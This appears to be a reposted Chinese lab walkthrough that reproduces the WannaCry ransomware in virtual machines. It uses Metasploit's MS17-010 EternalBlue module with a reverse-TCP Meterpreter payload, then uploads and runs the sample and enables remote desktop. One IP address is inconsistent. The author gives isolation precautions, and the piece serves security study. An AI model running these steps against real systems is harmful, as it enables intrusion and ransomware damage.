勒索病毒“WannaCry”复现
生活随笔
收集整理的這篇文章主要介紹了
勒索病毒“WannaCry”复现
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞簡介
永恒之藍利用Windows系統的SMB漏洞可以獲取系統的最高權限,然后通過惡意代碼掃描開放445端口的Windows系統;只要是被掃描到的Windows系統,只要開機上線,不需要用戶進行任何操作,即可通過共享漏洞上傳wannacry勒索病毒,遠程控制木馬等惡意程序。
準備過程
0x00:做好防護
在復現過程中需要先做好防護,以免造成真機感染病毒,那就GG了
先將共享文件夾給禁用掉,為了以防萬一這里再把真機的入站規則改一下,阻止445端口連接
0x02:實驗環境
kail:192.168.186.134 win7:192.168.186.131 病毒樣本漏洞復現
WannaCry是在永恒之藍的基礎上產生的,因此需要先通過永恒之藍獲得shell權限。
永恒之藍的編號是MS17-010,先使用msfconsole搜索一下漏洞模塊
search ms17-010
這里先使用下
這個作為搜索模塊對靶機進行漏洞掃描
發現存在漏洞(注意在虛擬機中win7靶機需要關閉防火墻才可以發現),既然有漏洞那下面就使用攻擊模塊
設置一下靶機的IP地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.186.131再設置下攻擊的payload,這里選擇
windows/x64/meterpreter/reverse_tcp
最后再設置一下攻擊機的IP即可
進行攻擊
攻擊成功,將我們前面準備好的WannaCry病毒上傳進去對方的主機中
進入shell權限,dir一下,發現上傳成功
執行病毒即可
接下來使用一下enable_rdp 腳本來開啟遠程桌面
遠程桌面連接Win7
rdesktop 192.168.190.131:3389
復現成功
總結:
復現該病毒時一定要注意做好防護,這類病毒的傳播性很強切勿用于惡作劇,切記切記!
總結
以上是生活随笔為你收集整理的勒索病毒“WannaCry”复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 浅析内存取证
- 下一篇: 内存取证——volatility命令